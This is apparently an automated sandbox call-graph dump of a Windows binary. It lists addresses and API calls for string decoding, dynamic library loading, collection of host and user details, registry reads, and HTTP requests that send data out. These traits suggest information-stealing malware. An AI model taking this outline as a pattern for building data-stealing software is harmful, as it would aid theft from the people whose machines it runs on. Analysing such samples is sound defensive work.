33833 427340 lstrlenA lstrcpy lstrcatA 33748->33833 33750 405beb 33834 4272b0 lstrcpy 33750->33834 33752 405bf4 33835 427340 lstrlenA lstrcpy lstrcatA 33752->33835 33754 405c09 33836 4272b0 lstrcpy 33754->33836 33756 405c12 33837 4272f0 lstrcpy lstrcatA 33756->33837 33758 405c25 33838 4272b0 lstrcpy 33758->33838 33760 405c2e 33839 427340 lstrlenA lstrcpy lstrcatA 33760->33839 33762 405c43 33840 4272b0 lstrcpy 33762->33840 33764 405c4c 33841 427340 lstrlenA lstrcpy lstrcatA 33764->33841 33766 405c62 33842 4272b0 lstrcpy 33766->33842 33768 405c6b 33843 427340 lstrlenA lstrcpy lstrcatA 33768->33843 33770 405c81 33844 4272b0 lstrcpy 33770->33844 33772 405c8a 33845 427340 lstrlenA lstrcpy lstrcatA 33772->33845 33774 405c9f 33846 4272b0 lstrcpy 33774->33846 33776 405ca8 33847 427340 lstrlenA lstrcpy lstrcatA 33776->33847 33778 405cbb 33848 4272b0 lstrcpy 33778->33848 33780 405cc4 33849 427340 lstrlenA lstrcpy lstrcatA 33780->33849 33782 405cd9 33850 4272b0 lstrcpy 33782->33850 33784 405ce2 33851 427340 lstrlenA lstrcpy lstrcatA 33784->33851 33786 405cf7 33852 4272b0 lstrcpy 33786->33852 33788 405d00 33853 4272f0 lstrcpy lstrcatA 33788->33853 33790 405d13 33854 4272b0 lstrcpy 33790->33854 33792 405d1c 33855 427340 lstrlenA lstrcpy lstrcatA 33792->33855 33794 405d31 33856 4272b0 lstrcpy 33794->33856 33796 405d3a 33857 427340 lstrlenA lstrcpy lstrcatA 33796->33857 33798 405d50 33858 4272b0 lstrcpy 33798->33858 33800 405d59 33859 427340 lstrlenA lstrcpy lstrcatA 33800->33859 33802 405d6f 33860 4272b0 lstrcpy 33802->33860 33804 405d78 33861 427340 lstrlenA lstrcpy lstrcatA 33804->33861 33806 405d8d 33862 4272b0 lstrcpy 33806->33862 33808 405d96 33809 405d9e 14 API calls 33808->33809 33810 405f1a InternetCloseHandle 33809->33810 33813 405e6a 33809->33813 33810->33719 33811 405e7b lstrlenA 33811->33813 33812 405eac lstrcpy lstrcatA 33812->33813 33813->33810 33813->33811 33813->33812 33814 405ee9 lstrcpy 33813->33814 33815 405ef8 InternetReadFile 33813->33815 33814->33813 33815->33810 33815->33813 33816->33675 33817->33677 33818->33691 33819->33722 33820->33724 33821->33726 33822->33728 33823->33730 33824->33732 33825->33734 33826->33736 33827->33738 33828->33740 33829->33742 33830->33744 33831->33746 33832->33748 33833->33750 33834->33752 33835->33754 33836->33756 33837->33758 33838->33760 33839->33762 33840->33764 33841->33766 33842->33768 33843->33770 33844->33772 33845->33774 33846->33776 33847->33778 33848->33780 33849->33782 33850->33784 33851->33786 33852->33788 33853->33790 33854->33792 33855->33794 33856->33796 33857->33798 33858->33800 33859->33802 33860->33804 33861->33806 33862->33808 34208 406e32 memcpy memcpy GetProcessHeap HeapAlloc memcpy 34051 248003c 34052 2480049 34051->34052 34066 2480e0f SetErrorMode SetErrorMode 34052->34066 34057 2480265 34058 24802ce VirtualProtect 34057->34058 34060 248030b 34058->34060 34059 2480439 VirtualFree 34064 24805f4 LoadLibraryA 34059->34064 34065 24804be 34059->34065 34060->34059 34061 24804e3 LoadLibraryA 34061->34065 34063 24808c7 34064->34063 34065->34061 34065->34064 34067 2480223 34066->34067 34068 2480d90 34067->34068 34069 2480dad 34068->34069 34070 2480dbb GetPEB 34069->34070 34071 2480238 VirtualAlloc 34069->34071 34070->34071 34071->34057 34163 248d730 133 API calls 34113 24a1e37 2128 API calls 34164 24a4b37 32 API calls 34165 24a3337 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 34167 24a7735 43 API calls ctype 34168 24a9656 170 API calls 2 library calls 34212 425ac0 9 API calls 34170 249c7c0 ShellExecuteEx 34115 24a3ec7 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 34214 249cc4e StrCmpCA StrCmpCA StrCmpCA strtok_s 34253 24a35c7 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 34116 408cce memcpy 34254 24a99c5 41 API calls __amsg_exit 34117 409cd0 18 API calls 33911 421bd0 33936 4029a0 33911->33936 33915 421be3 33916 421c15 GetUserDefaultLangID 33915->33916 33917 421c3e 33916->33917 34037 422a70 GetProcessHeap HeapAlloc GetComputerNameA 33917->34037 33919 421c43 33920 421c6d lstrlenA 33919->33920 33921 421c85 33920->33921 33922 421ca9 lstrlenA 33921->33922 33923 421cbf 33922->33923 33924 422a70 3 API calls 33923->33924 33925 421ce5 lstrlenA 33924->33925 33926 421cfa 33925->33926 33927 421d20 lstrlenA 33926->33927 33928 421d36 33927->33928 34039 4229e0 GetProcessHeap HeapAlloc GetUserNameA 33928->34039 33930 421d59 lstrlenA 33931 421d6d 33930->33931 33932 421ddc OpenEventA 33931->33932 33933 421e14 CreateEventA 33932->33933 34040 421b00 GetSystemTime 33933->34040 33935 421e28 33937 404980 34 API calls 33936->33937 33938 4029b1 33937->33938 33939 404980 34 API calls 33938->33939 33940 4029c7 33939->33940 33941 404980 34 API calls 33940->33941 33942 4029dd 33941->33942 33943 404980 34 API calls 33942->33943 33944 4029f3 33943->33944 33945 404980 34 API calls 33944->33945 33946 402a09 33945->33946 33947 404980 34 API calls 33946->33947 33948 402a1f 33947->33948 33949 404980 34 API calls 33948->33949 33950 402a38 33949->33950 33951 404980 34 API calls 33950->33951 33952 402a4e 33951->33952 33953 404980 34 API calls 33952->33953 33954 402a64 33953->33954 33955 404980 34 API calls 33954->33955 33956 402a7a 33955->33956 33957 404980 34 API calls 33956->33957 33958 402a90 33957->33958 33959 404980 34 API calls 33958->33959 33960 402aa6 33959->33960 33961 404980 34 API calls 33960->33961 33962 402abf 33961->33962 33963 404980 34 API calls 33962->33963 33964 402ad5 33963->33964 33965 404980 34 API calls 33964->33965 33966 402aeb 33965->33966 33967 404980 34 API calls 33966->33967 33968 402b01 33967->33968 33969 404980 34 API calls 33968->33969 33970 402b17 33969->33970 33971 404980 34 API calls 33970->33971 33972 402b2d 33971->33972 33973 404980 34 API calls 33972->33973 33974 402b46 33973->33974 33975 404980 34 API calls 33974->33975 33976 402b5c 33975->33976 33977 404980 34 API calls 33976->33977 33978 402b72 33977->33978 33979 404980 34 API calls 33978->33979 33980 402b88 33979->33980 33981 404980 34 API calls 33980->33981 33982 402b9e 33981->33982 33983 404980 34 API calls 33982->33983 33984 402bb4 33983->33984 33985 404980 34 API calls 33984->33985 33986 402bcd 33985->33986 33987 404980 34 API calls 33986->33987 33988 402be3 33987->33988 33989 404980 34 API calls 33988->33989 33990 402bf9 33989->33990 33991 404980 34 API calls 33990->33991 33992 402c0f 33991->33992 33993 404980 34 API calls 33992->33993 33994 402c25 33993->33994 33995 404980 34 API calls 33994->33995 33996 402c3b 33995->33996 33997 404980 34 API calls 33996->33997 33998 402c54 33997->33998 33999 404980 34 API calls 33998->33999 34000 402c6a 33999->34000 34001 404980 34 API calls 34000->34001 34002 402c80 34001->34002 34003 404980 34 API calls 34002->34003 34004 402c96 34003->34004 34005 404980 34 API calls 34004->34005 34006 402cac 34005->34006 34007 404980 34 API calls 34006->34007 34008 402cc2 34007->34008 34009 404980 34 API calls 34008->34009 34010 402cdb 34009->34010 34011 404980 34 API calls 34010->34011 34012 402cf1 34011->34012 34013 404980 34 API calls 34012->34013 34014 402d07 34013->34014 34015 404980 34 API calls 34014->34015 34016 402d1d 34015->34016 34017 404980 34 API calls 34016->34017 34018 402d33 34017->34018 34019 404980 34 API calls 34018->34019 34020 402d49 34019->34020 34021 404980 34 API calls 34020->34021 34022 402d62 34021->34022 34023 4263c0 GetPEB 34022->34023 34024 4265f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 34023->34024 34025 4263f3 34023->34025 34026 426655 GetProcAddress 34024->34026 34027 426668 34024->34027 34032 426407 20 API calls 34025->34032 34026->34027 34028 426671 GetProcAddress GetProcAddress 34027->34028 34029 42669c 34027->34029 34028->34029 34030 4266a5 GetProcAddress 34029->34030 34031 4266b8 34029->34031 34030->34031 34033 4266c1 GetProcAddress 34031->34033 34034 4266d4 34031->34034 34032->34024 34033->34034 34035 426707 34034->34035 34036 4266dd GetProcAddress GetProcAddress 34034->34036 34035->33915 34036->34035 34038 422ac4 34037->34038 34038->33919 34039->33930 34048 421800 25 API calls 34040->34048 34042 421b61 sscanf 34049 402930 34042->34049 34045 421bc9 34045->33935 34046 421bc2 ExitProcess 34047 421bb6 34047->34045 34047->34046 34048->34042 34050 402934 SystemTimeToFileTime SystemTimeToFileTime 34049->34050 34050->34045 34050->34047 34172 249e3d0 140 API calls 34072 92a00e 34073 92a011 34072->34073 34076 92a91e 34073->34076 34077 92a92d 34076->34077 34080 92b0be 34077->34080 34081 92b0d9 34080->34081 34082 92b0e2 CreateToolhelp32Snapshot 34081->34082 34083 92b0fe Module32First 34081->34083 34082->34081 34082->34083 34084 92a91d 34083->34084 34085 92b10d 34083->34085 34087 92ad7d 34085->34087 34088 92ada8 34087->34088 34089 92adf1 34088->34089 34090 92adb9 VirtualAlloc 34088->34090 34089->34089 34090->34089 34119 24a2ed7 GetUserDefaultLocaleName LocalAlloc CharToOemW 34256 4023e0 116 API calls 34120 4180e0 7 API calls 33874 4226e0 GetWindowsDirectoryA 33875 422725 33874->33875 33876 42272c GetVolumeInformationA 33874->33876 33875->33876 33877 42278c GetProcessHeap HeapAlloc 33876->33877 33879 4227c6 wsprintfA 33877->33879 33880 4227c2 33877->33880 33879->33880 33883 427210 lstrcpy 33880->33883 33882 422800 33883->33882 34257 423fe0 GetFileAttributesA 34218 2481ccb 156 API calls 34122 40bce9 90 API calls 34220 24a0ce7 612 API calls 34259 408ff0 21 API calls 34123 24a0af0 1732 API calls 34178 24a33f7 GetSystemInfo wsprintfA 33362 404b80 33363 404ba0 33362->33363 33364 404bb5 33363->33364 33365 404bad lstrcpy 33363->33365 33516 404ae0 33364->33516 33365->33364 33367 404bc0 33368 404bfc lstrcpy 33367->33368 33369 404c08 33367->33369 33368->33369 33370 404c2f lstrcpy 33369->33370 33371 404c3b 33369->33371 33370->33371 33372 404c5f lstrcpy 33371->33372 33373 404c6b 33371->33373 33372->33373 33374 404c9d lstrcpy 33373->33374 33375 404ca9 33373->33375 33374->33375 33376 404cd0 lstrcpy 33375->33376 33377 404cdc InternetOpenA StrCmpCA 33375->33377 33376->33377 33378 404d10 33377->33378 33379 4053e8 InternetCloseHandle CryptStringToBinaryA 33378->33379 33380 404d1f 33378->33380 33381 405418 LocalAlloc 33379->33381 33398 405508 33379->33398 33520 423e10 lstrcpy lstrcpy GetSystemTime 33380->33520 33383 40542f CryptStringToBinaryA 33381->33383 33381->33398 33384 405447 LocalFree 33383->33384 33385 405459 lstrlenA 33383->33385 33384->33398 33386 40546d 33385->33386 33388 405493 lstrlenA 33386->33388 33389 405487 lstrcpy 33386->33389 33387 404d2a 33390 404d53 lstrcpy lstrcatA 33387->33390 33391 404d68 33387->33391 33393 4054ad 33388->33393 33389->33388 33390->33391 33392 404d8a lstrcpy 33391->33392 33395 404d92 33391->33395 33392->33395 33394 4054bf lstrcpy lstrcatA 33393->33394 33396 4054d2 33393->33396 33394->33396 33397 404da1 lstrlenA 33395->33397 33400 405501 33396->33400 33401 4054f9 lstrcpy 33396->33401 33399 404db9 33397->33399 33402 404dc5 lstrcpy lstrcatA 33399->33402 33403 404ddc 33399->33403 33400->33398 33401->33400 33402->33403 33404 404e05 33403->33404 33405 404dfd lstrcpy 33403->33405 33406 404e0c lstrlenA 33404->33406 33405->33404 33407 404e22 33406->33407 33408 404e2e lstrcpy lstrcatA 33407->33408 33409 404e45 33407->33409 33408->33409 33410 404e66 lstrcpy 33409->33410 33411 404e6e 33409->33411 33410->33411 33412 404e95 lstrcpy lstrcatA 33411->33412 33413 404eab 33411->33413 33412->33413 33414 404ed4 33413->33414 33415 404ecc lstrcpy 33413->33415 33416 404edb lstrlenA 33414->33416 33415->33414 33417 404ef1 33416->33417 33418 404efd lstrcpy lstrcatA 33417->33418 33419 404f14 33417->33419 33418->33419 33420 404f3d 33419->33420 33421 404f35 lstrcpy 33419->33421 33422 404f44 lstrlenA 33420->33422 33421->33420 33423 404f5a 33422->33423 33424 404f66 lstrcpy lstrcatA 33423->33424 33425 404f7d 33423->33425 33424->33425 33426 404fa9 33425->33426 33427 404fa1 lstrcpy 33425->33427 33428 404fb0 lstrlenA 33426->33428 33427->33426 33429 404fcb 33428->33429 33430 404fdc lstrcpy lstrcatA 33429->33430 33431 404fec 33429->33431 33430->33431 33432 40500a lstrcpy lstrcatA 33431->33432 33433 40501d 33431->33433 33432->33433 33434 40503b lstrcpy 33433->33434 33435 405043 33433->33435 33434->33435 33436 405051 InternetConnectA 33435->33436 33436->33379 33437 405080 HttpOpenRequestA 33436->33437 33438 4053e1 InternetCloseHandle 33437->33438 33439 4050bb 33437->33439 33438->33379 33521 427340 lstrlenA lstrcpy lstrcatA 33439->33521 33441 4050cb 33522 4272b0 lstrcpy 33441->33522 33443 4050d4 33523 4272f0 lstrcpy lstrcatA 33443->33523 33445 4050e7 33524 4272b0 lstrcpy 33445->33524 33447 4050f0 33525 427340 lstrlenA lstrcpy lstrcatA 33447->33525 33449 405105 33526 4272b0 lstrcpy 33449->33526 33451 40510e 33527 427340 lstrlenA lstrcpy lstrcatA 33451->33527 33453 405124 33528 4272b0 lstrcpy 33453->33528 33455 40512d 33529 427340 lstrlenA lstrcpy lstrcatA 33455->33529 33457 405143 33530 4272b0 lstrcpy 33457->33530 33459 40514c 33531 427340 lstrlenA lstrcpy lstrcatA 33459->33531 33461 405161 33532 4272b0 lstrcpy 33461->33532 33463 40516a 33533 4272f0 lstrcpy lstrcatA 33463->33533 33465 40517d 33534 4272b0 lstrcpy 33465->33534 33467 405186 33535 427340 lstrlenA lstrcpy lstrcatA 33467->33535 33469 40519b 33536 4272b0 lstrcpy 33469->33536 33471 4051a4 33537 427340 lstrlenA lstrcpy lstrcatA 33471->33537 33473 4051b9 33538 4272b0 lstrcpy 33473->33538 33475 4051c2 33539 4272f0 lstrcpy lstrcatA 33475->33539 33477 4051d5 33540 4272b0 lstrcpy 33477->33540 33479 4051de 33541 427340 lstrlenA lstrcpy lstrcatA 33479->33541 33481 4051f3 33542 4272b0 lstrcpy 33481->33542 33483 4051fc 33543 427340 lstrlenA lstrcpy lstrcatA 33483->33543 33485 405212 33544 4272b0 lstrcpy 33485->33544 33487 40521b 33545 427340 lstrlenA lstrcpy lstrcatA 33487->33545 33489 405231 33546 4272b0 lstrcpy 33489->33546 33491 40523a 33547 427340 lstrlenA lstrcpy lstrcatA 33491->33547 33493 40524f 33548 4272b0 lstrcpy 33493->33548 33495 405258 33549 4272f0 lstrcpy lstrcatA 33495->33549 33497 40526b 33550 4272b0 lstrcpy 33497->33550 33499 405274 33500 4052a0 lstrcpy 33499->33500 33501 4052ac 33499->33501 33500->33501 33551 4272f0 lstrcpy lstrcatA 33501->33551 33503 4052ba 33552 4272f0 lstrcpy lstrcatA 33503->33552 33505 4052c7 33553 4272b0 lstrcpy 33505->33553 33507 4052d1 33508 4052e1 lstrlenA lstrlenA HttpSendRequestA InternetReadFile 33507->33508 33509 4053cc InternetCloseHandle 33508->33509 33513 405322 33508->33513 33511 4053de 33509->33511 33510 40532d lstrlenA 33510->33513 33511->33438 33512 40535e lstrcpy lstrcatA 33512->33513 33513->33509 33513->33510 33513->33512 33514 40539b lstrcpy 33513->33514 33515 4053aa InternetReadFile 33513->33515 33514->33513 33515->33509 33515->33513 33517 404af0 33516->33517 33517->33517 33518 404af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlenA InternetCrackUrlA 33517->33518 33519 404b61 33518->33519 33519->33367 33520->33387 33521->33441 33522->33443 33523->33445 33524->33447 33525->33449 33526->33451 33527->33453 33528->33455 33529->33457 33530->33459 33531->33461 33532->33463 33533->33465 33534->33467 33535->33469 33536->33471 33537->33473 33538->33475 33539->33477 33540->33479 33541->33481 33542->33483 33543->33485 33544->33487 33545->33489 33546->33491 33547->33493 33548->33495 33549->33497 33550->33499 33551->33503 33552->33505 33553->33507 34222 425a80 11 API calls 34223 24a0c88 614 API calls 34224 249e480 133 API calls 34124 24979aa 1167 API calls 34125 24a2a87 10 API calls 34126 24a3687 6 API calls 34227 24a3487 7 API calls 34127 24981fc strtok_s StrCmpCA 32725 402d90 33358 404980 17 API calls 32725->33358 32727 402da2 32728 404980 34 API calls 32727->32728 32729 402dc0 32728->32729 32730 404980 34 API calls 32729->32730 32731 402dd6 32730->32731 32732 404980 34 API calls 32731->32732 32733 402deb 32732->32733 32734 404980 34 API calls 32733->32734 32735 402e0c 32734->32735 32736 404980 34 API calls 32735->32736 32737 402e21 32736->32737 32738 404980 34 API calls 32737->32738 32739 402e39 32738->32739 32740 404980 34 API calls 32739->32740 32741 402e5a 32740->32741 32742 404980 34 API calls 32741->32742 32743 402e6f 32742->32743 32744 404980 34 API calls 32743->32744 32745 402e85 32744->32745 32746 404980 34 API calls 32745->32746 32747 402e9b 32746->32747 32748 404980 34 API calls 32747->32748 32749 402eb1 32748->32749 32750 404980 34 API calls 32749->32750 32751 402eca 32750->32751 32752 404980 34 API calls 32751->32752 32753 402ee0 32752->32753 32754 404980 34 API calls 32753->32754 32755 402ef6 32754->32755 32756 404980 34 API calls 32755->32756 32757 402f0c 32756->32757 32758 404980 34 API calls 32757->32758 32759 402f22 32758->32759 32760 404980 34 API calls 32759->32760 32761 402f38 32760->32761 32762 404980 34 API calls 32761->32762 32763 402f51 32762->32763 32764 404980 34 API calls 32763->32764 32765 402f67 32764->32765 32766 404980 34 API calls 32765->32766 32767 402f7d 32766->32767 32768 404980 34 API calls 32767->32768 32769 402f93 32768->32769 32770 404980 34 API calls 32769->32770 32771 402fa9 32770->32771 32772 404980 34 API calls 32771->32772 32773 402fbf 32772->32773 32774 404980 34 API calls 32773->32774 32775 402fd8 32774->32775 32776 404980 34 API calls 32775->32776 32777 402fee 32776->32777 32778 404980 34 API calls 32777->32778 32779 403004 32778->32779 32780 404980 34 API calls 32779->32780 32781 40301a 32780->32781 32782 404980 34 API calls 32781->32782 32783 403030 32782->32783 32784 404980 34 API calls 32783->32784 32785 403046 32784->32785 32786 404980 34 API calls 32785->32786 32787 40305f 32786->32787 32788 404980 34 API calls 32787->32788 32789 403075 32788->32789 32790 404980 34 API calls 32789->32790 32791 40308b 32790->32791 32792 404980 34 API calls 32791->32792 32793 4030a1 32792->32793 32794 404980 34 API calls 32793->32794 32795 4030b7 32794->32795 32796 404980 34 API calls 32795->32796 32797 4030cd 32796->32797 32798 404980 34 API calls 32797->32798 32799 4030e6 32798->32799 32800 404980 34 API calls 32799->32800 32801 4030fc 32800->32801 32802 404980 34 API calls 32801->32802 32803 403112 32802->32803 32804 404980 34 API calls 32803->32804 32805 403128 32804->32805 32806 404980 34 API calls 32805->32806 32807 40313e 32806->32807 32808 404980 34 API calls 32807->32808 32809 403154 32808->32809 32810 404980 34 API calls 32809->32810 32811 40316d 32810->32811 32812 404980 34 API calls 32811->32812 32813 403183 32812->32813 32814 404980 34 API calls 32813->32814 32815 403199 32814->32815 32816 404980 34 API calls 32815->32816 32817 4031af 32816->32817 32818 404980 34 API calls 32817->32818 32819 4031c5 32818->32819 32820 404980 34 API calls 32819->32820 32821 4031db 32820->32821 32822 404980 34 API calls 32821->32822 32823 4031f4 32822->32823 32824 404980 34 API calls 32823->32824 32825 40320a 32824->32825 32826 404980 34 API calls 32825->32826 32827 403220 32826->32827 32828 404980 34 API calls 32827->32828 32829 403236 32828->32829 32830 404980 34 API calls 32829->32830 32831 40324c 32830->32831 32832 404980 34 API calls 32831->32832 32833 403262 32832->32833 32834 404980 34 API calls 32833->32834 32835 40327b 32834->32835 32836 404980 34 API calls 32835->32836 32837 403291 32836->32837 32838 404980 34 API calls 32837->32838 32839 4032a7 32838->32839 32840 404980 34 API calls 32839->32840 32841 4032bd 32840->32841 32842 404980 34 API calls 32841->32842 32843 4032d3 32842->32843 32844 404980 34 API calls 32843->32844 32845 4032e9 32844->32845 32846 404980 34 API calls 32845->32846 32847 403302 32846->32847 32848 404980 34 API calls 32847->32848 32849 403318 32848->32849 32850 404980 34 API calls 32849->32850 32851 40332e 32850->32851 32852 404980 34 API calls 32851->32852 32853 403344 32852->32853 32854 404980 34 API calls 32853->32854 32855 40335a 32854->32855 32856 404980 34 API calls 32855->32856 32857 403370 32856->32857 32858 404980 34 API calls 32857->32858 32859 403389 32858->32859 32860 404980 34 API calls 32859->32860 32861 40339f 32860->32861 32862 404980 34 API calls 32861->32862 32863 4033b5 32862->32863 32864 404980 34 API calls 32863->32864 32865 4033cb 32864->32865 32866 404980 34 API calls 32865->32866 32867 4033e1 32866->32867 32868 404980 34 API calls 32867->32868 32869 4033f7 32868->32869 32870 404980 34 API calls 32869->32870 32871 403410 32870->32871 32872 404980 34 API calls 32871->32872 32873 403426 32872->32873 32874 404980 34 API calls 32873->32874 32875 40343c 32874->32875 32876 404980 34 API calls 32875->32876 32877 403452 32876->32877 32878 404980 34 API calls 32877->32878 32879 403468 32878->32879 32880 404980 34 API calls 32879->32880 32881 40347e 32880->32881 32882 404980 34 API calls 32881->32882 32883 403497 32882->32883 32884 404980 34 API calls 32883->32884 32885 4034ad 32884->32885 32886 404980 34 API calls 32885->32886 32887 4034c3 32886->32887 32888 404980 34 API calls 32887->32888 32889 4034d9 32888->32889 32890 404980 34 API calls 32889->32890 32891 4034ef 32890->32891 32892 404980 34 API calls 32891->32892 32893 403505 32892->32893 32894 404980 34 API calls 32893->32894 32895 40351e 32894->32895 32896 404980 34 API calls 32895->32896 32897 403534 32896->32897 32898 404980 34 API calls 32897->32898 32899 40354a 32898->32899 32900 404980 34 API calls 32899->32900 32901 403560 32900->32901 32902 404980 34 API calls 32901->32902 32903 403576 32902->32903 32904 404980 34 API calls 32903->32904 32905 40358c 32904->32905 32906 404980 34 API calls 32905->32906 32907 4035a5 32906->32907 32908 404980 34 API calls 32907->32908 32909 4035bb 32908->32909 32910 404980 34 API calls 32909->32910 32911 4035d1 32910->32911 32912 404980 34 API calls 32911->32912 32913 4035e7 32912->32913 32914 404980 34 API calls 32913->32914 32915 4035fd 32914->32915 32916 404980 34 API calls 32915->32916 32917 403613 32916->32917 32918 404980 34 API calls 32917->32918 32919 40362c 32918->32919 32920 404980 34 API calls 32919->32920 32921 403642 32920->32921 32922 404980 34 API calls 32921->32922 32923 403658 32922->32923 32924 404980 34 API calls 32923->32924 32925 40366e 32924->32925 32926 404980 34 API calls 32925->32926 32927 403684 32926->32927 32928 404980 34 API calls 32927->32928 32929 40369a 32928->32929 32930 404980 34 API calls 32929->32930 32931 4036b3 32930->32931 32932 404980 34 API calls 32931->32932 32933 4036c9 32932->32933 32934 404980 34 API calls 32933->32934 32935 4036df 32934->32935 32936 404980 34 API calls 32935->32936 32937 4036f5 32936->32937 32938 404980 34 API calls 32937->32938 32939 40370b 32938->32939 32940 404980 34 API calls 32939->32940 32941 403721 32940->32941 32942 404980 34 API calls 32941->32942 32943 40373a 32942->32943 32944 404980 34 API calls 32943->32944 32945 403750 32944->32945 32946 404980 34 API calls 32945->32946 32947 403766 32946->32947 32948 404980 34 API calls 32947->32948 32949 40377c 32948->32949 32950 404980 34 API calls 32949->32950 32951 403792 32950->32951 32952 404980 34 API calls 32951->32952 32953 4037a8 32952->32953 32954 404980 34 API calls 32953->32954 32955 4037c1 32954->32955 32956 404980 34 API calls 32955->32956 32957 4037d7 32956->32957 32958 404980 34 API calls 32957->32958 32959 4037ed 32958->32959 32960 404980 34 API calls 32959->32960 32961 403803 32960->32961 32962 404980 34 API calls 32961->32962 32963 403819 32962->32963 32964 404980 34 API calls 32963->32964 32965 40382f 32964->32965 32966 404980 34 API calls 32965->32966 32967 403848 32966->32967 32968 404980 34 API calls 32967->32968 32969 40385e 32968->32969 32970 404980 34 API calls 32969->32970 32971 403874 32970->32971 32972 404980 34 API calls 32971->32972 32973 40388a 32972->32973 32974 404980 34 API calls 32973->32974 32975 4038a0 32974->32975 32976 404980 34 API calls 32975->32976 32977 4038b6 32976->32977 32978 404980 34 API calls 32977->32978 32979 4038cf 32978->32979 32980 404980 34 API calls 32979->32980 32981 4038e5 32980->32981 32982 404980 34 API calls 32981->32982 32983 4038fb 32982->32983 32984 404980 34 API calls 32983->32984 32985 403911 32984->32985 32986 404980 34 API calls 32985->32986 32987 403927 32986->32987 32988 404980 34 API calls 32987->32988 32989 40393d 32988->32989 32990 404980 34 API calls 32989->32990 32991 403956 32990->32991 32992 404980 34 API calls 32991->32992 32993 40396c 32992->32993 32994 404980 34 API calls 32993->32994 32995 403982 32994->32995 32996 404980 34 API calls 32995->32996 32997 403998 32996->32997 32998 404980 34 API calls 32997->32998 32999 4039ae 32998->32999 33000 404980 34 API calls 32999->33000 33001 4039c4 33000->33001 33002 404980 34 API calls 33001->33002 33003 4039dd 33002->33003 33004 404980 34 API calls 33003->33004 33005 4039f3 33004->33005 33006 404980 34 API calls 33005->33006 33007 403a09 33006->33007 33008 404980 34 API calls 33007->33008 33009 403a1f 33008->33009 33010 404980 34 API calls 33009->33010 33011 403a35 33010->33011 33012 404980 34 API calls 33011->33012 33013 403a4b 33012->33013 33014 404980 34 API calls 33013->33014 33015 403a64 33014->33015 33016 404980 34 API calls 33015->33016 33017 403a7a 33016->33017 33018 404980 34 API calls 33017->33018 33019 403a90 33018->33019 33020 404980 34 API calls 33019->33020 33021 403aa6 33020->33021 33022 404980 34 API calls 33021->33022 33023 403abc 33022->33023 33024 404980 34 API calls 33023->33024 33025 403ad2 33024->33025 33026 404980 34 API calls 33025->33026 33027 403aeb 33026->33027 33028 404980 34 API calls 33027->33028 33029 403b01 33028->33029 33030 404980 34 API calls 33029->33030 33031 403b17 33030->33031 33032 404980 34 API calls 33031->33032 33033 403b2d 33032->33033 33034 404980 34 API calls 33033->33034 33035 403b43 33034->33035 33036 404980 34 API calls 33035->33036 33037 403b59 33036->33037 33038 404980 34 API calls 33037->33038 33039 403b72 33038->33039 33040 404980 34 API calls 33039->33040 33041 403b88 33040->33041 33042 404980 34 API calls 33041->33042 33043 403b9e 33042->33043 33044 404980 34 API calls 33043->33044 33045 403bb4 33044->33045 33046 404980 34 API calls 33045->33046 33047 403bca 33046->33047 33048 404980 34 API calls 33047->33048 33049 403be0 33048->33049 33050 404980 34 API calls 33049->33050 33051 403bf9 33050->33051 33052 404980 34 API calls 33051->33052 33053 403c0f 33052->33053 33054 404980 34 API calls 33053->33054 33055 403c25 33054->33055 33056 404980 34 API calls 33055->33056 33057 403c3b 33056->33057 33058 404980 34 API calls 33057->33058 33059 403c51 33058->33059 33060 404980 34 API calls 33059->33060 33061 403c67 33060->33061 33062 404980 34 API calls 33061->33062 33063 403c80 33062->33063 33064 404980 34 API calls 33063->33064 33065 403c96 33064->33065 33066 404980 34 API calls 33065->33066 33067 403cac 33066->33067 33068 404980 34 API calls 33067->33068 33069 403cc2 33068->33069 33070 404980 34 API calls 33069->33070 33071 403cd8 33070->33071 33072 404980 34 API calls 33071->33072 33073 403cee 33072->33073 33074 404980 34 API calls 33073->33074 33075 403d07 33074->33075 33076 404980 34 API calls 33075->33076 33077 403d1d 33076->33077 33078 404980 34 API calls 33077->33078 33079 403d33 33078->33079 33080 404980 34 API calls 33079->33080 33081 403d49 33080->33081 33082 404980 34 API calls 33081->33082 33083 403d5f 33082->33083 33084 404980 34 API calls 33083->33084 33085 403d75 33084->33085 33086 404980 34 API calls 33085->33086 33087 403d8e 33086->33087 33088 404980 34 API calls 33087->33088 33089 403da4 33088->33089 33090 404980 34 API calls 33089->33090 33091 403dba 33090->33091 33092 404980 34 API calls 33091->33092 33093 403dd0 33092->33093 33094 404980 34 API calls 33093->33094 33095 403de6 33094->33095 33096 404980 34 API calls 33095->33096 33097 403dfc 33096->33097 33098 404980 34 API calls 33097->33098 33099 403e15 33098->33099 33100 404980 34 API calls 33099->33100 33101 403e2b 33100->33101 33102 404980 34 API calls 33101->33102 33103 403e41 33102->33103 33104 404980 34 API calls 33103->33104 33105 403e57 33104->33105 33106 404980 34 API calls 33105->33106 33107 403e6d 33106->33107 33108 404980 34 API calls 33107->33108 33109 403e83 33108->33109 33110 404980 34 API calls 33109->33110 33111 403e9c 33110->33111 33112 404980 34 API calls 33111->33112 33113 403eb2 33112->33113 33114 404980 34 API calls 33113->33114 33115 403ec8 33114->33115 33116 404980 34 API calls 33115->33116 33117 403ede 33116->33117 33118 404980 34 API calls 33117->33118 33119 403ef4 33118->33119 33120 404980 34 API calls 33119->33120 33121 403f0a 33120->33121 33122 404980 34 API calls 33121->33122 33123 403f23 33122->33123 33124 404980 34 API calls 33123->33124 33125 403f39 33124->33125 33126 404980 34 API calls 33125->33126 33127 403f4f 33126->33127 33128 404980 34 API calls 33127->33128 33129 403f65 33128->33129 33130 404980 34 API calls 33129->33130 33131 403f7b 33130->33131 33132 404980 34 API calls 33131->33132 33133 403f91 33132->33133 33134 404980 34 API calls 33133->33134 33135 403faa 33134->33135 33136 404980 34 API calls 33135->33136 33137 403fc0 33136->33137 33138 404980 34 API calls 33137->33138 33139 403fd6 33138->33139 33140 404980 34 API calls 33139->33140 33141 403fec 33140->33141 33142 404980 34 API calls 33141->33142 33143 404002 33142->33143 33144 404980 34 API calls 33143->33144 33145 404018 33144->33145 33146 404980 34 API calls 33145->33146 33147 404031 33146->33147 33148 404980 34 API calls 33147->33148 33149 404047 33148->33149 33150 404980 34 API calls 33149->33150 33151 40405d 33150->33151 33152 404980 34 API calls 33151->33152 33153 404073 33152->33153 33154 404980 34 API calls 33153->33154 33155 